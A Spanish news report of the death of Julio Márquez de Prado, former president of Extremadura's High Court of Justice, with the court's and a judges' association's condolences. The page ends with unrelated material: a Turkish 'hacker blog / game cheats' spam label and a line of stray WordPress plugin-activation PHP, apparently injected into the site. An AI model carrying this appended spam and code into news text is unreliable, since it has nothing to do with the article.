Muere el expresidente del Tribunal Superior de Justicia de Extremadura Julio Márquez de Prado


El expresidente del Tribunal Superior de Justicia de Extremadura (TSJEx), Julio Márquez de Prado, ha muerto este martes 23 de febrero a los 72 años de edad. Márquez de Prado fue presidente del TSJEx entre diciembre de 2003 y finales de 2019, año en el que agotó sus mandatos. Fue predecesor de la actual presidenta, María Félix Tena, magistrada que se convirtió en la primera mujer presidenta del Tribunal Superior de Justicia de Extremadura. El expresidente se jubiló el año pasado.

La noticia de su fallecimiento ha sido comunicada por la propia institución a través de sus redes sociales. «Lamentamos profundamente el fallecimiento del expresidente del Tribunal Superior de Justicia de Extremadura. Nuestro más sentido pésame y condolencias para la familia, amigos y compañeros, desde la que fue durante tantos años su casa, fiel servidor de la Justicia. Descanse en Paz», han expresado.

Desde la Asociación Profesional de la Magistratura, a la que pertenecía Márquez de Prado, han alabado su «vitalidad, firmeza y su enorme personalidad» y han mostrado también su pesar por la pérdida a través de un mensaje. «Sus compañeros le recordaremos. Descanse en paz y nuestro más sincero pésame a sus seres queridos», han indicado.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );